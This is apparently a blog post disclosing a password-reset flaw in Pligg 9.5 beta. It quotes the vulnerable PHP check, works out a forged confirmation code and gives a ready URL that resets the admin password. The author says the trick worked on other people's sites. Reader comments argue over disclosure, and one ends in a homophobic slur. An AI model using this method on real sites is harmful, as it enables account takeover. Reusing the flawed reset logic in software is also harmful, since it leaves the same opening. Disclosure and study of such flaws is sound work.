Hacking Pligg 9.5 beta – Exploit
Pligg is a Social Bookmarking Web 2.0 Content Management System based on the popular social news website Digg.com.
A security flaw makes it possible to change the password of any user and log in as that user.
VideoSift is Hacked! VideoSift is one of the largest (still small) websites that use Pligg.
How it works:
To reset a forgotten password, Pligg follows the classical process. A confirmation code is generated and sent by e-mail to the mailbox of the user concerned. The user has to follow the link containing the confirmation code; if the confirmation code passes the check, the password is reset to a pre-defined value.
The part of the source code in charge of this check is shown below:
pligg_dir/libs/html1.php:
    function generateHash($plainText, $salt = null) {
        if ($salt === null) {
            // no salt supplied: derive a random one
            $salt = substr(md5(uniqid(rand(), true)), 0, SALT_LENGTH);
        } else {
            // salt supplied by the caller: only its first SALT_LENGTH characters are used
            $salt = substr($salt, 0, SALT_LENGTH);
        }
        // result is the salt followed by sha1(salt . plainText); nothing secret is mixed in
        return $salt . sha1($salt . $plainText);
    }
pligg_dir/login.php:
    $confirmationcode = $_GET["confirmationcode"];
    // the salt used for verification is taken from the submitted code itself,
    // and the username comes from the request as well
    if (generateHash($username, substr($confirmationcode, 0, SALT_LENGTH)) == $confirmationcode) {
        $db->query('UPDATE `' . table_users . '` SET `user_pass` = "033700e5a7759d0663e33b18d6ca0dc2b572c20031b575750" WHERE `user_login`= "'.$username.'"');
Unfortunately, for any given username you can easily generate a confirmation code that passes the check on line 2 above: the salt is read from the submitted code, the username is public, and nothing in the comparison depends on a value stored on the server when the reset was requested.
Example:
salt = 123456789 and username = admin
we have:
sha1("123456789admin") = 1e2f566cbda0a9c855240bf21b8bae030404cad7
and thus:
$confirmationcode = salt . sha1(salt . username) = 1234567891e2f566cbda0a9c855240bf21b8bae030404cad7
With the following URL, the password of the user “admin” is reset to the pre-defined value:
http://www.domain.com/login.php?processlogin=4&username=admin&confirmationcode=1234567891e2f566cbda0a9c855240bf21b8bae030404cad7
Pligg Forum members were notified about it via e-mail this morning. Most Pligg webmasters haven't signed up for the forum.
All Pligg websites I tried were vulnerable to this exploit. There is no commercial value for me, so don’t worry, administrators have been notified that it’s time to patch.
Shame on you for posting this exploit..
You are not helping anyone by doing this, you are only causing more problems..
The exploit was reported 2 days ago on major security websites. The patch can be found on the Pligg forum.
First of all, showing people HOW to EXPLOIT this is just retarded. You could have simply written an article about it and not provided the tools to everyone. Secondly, if there is no commercial value for you, then you shouldn't be running AdSense ads alongside it. Lastly, you admit to (trying), which is hacking into other people's sites. P.S. It is against the AdSense terms of service to provide exploits along with their ads. So I suggest you make some changes before someone reports you to AdSense.
Whatever Dave…
SecurityFocus
Bugtraq
etc…
I think he should post the way he did; sometimes when people report bugs or exploits, they don't get fixed. Now maybe they will get off their butts and fix their garbage.
dave meyers is a homo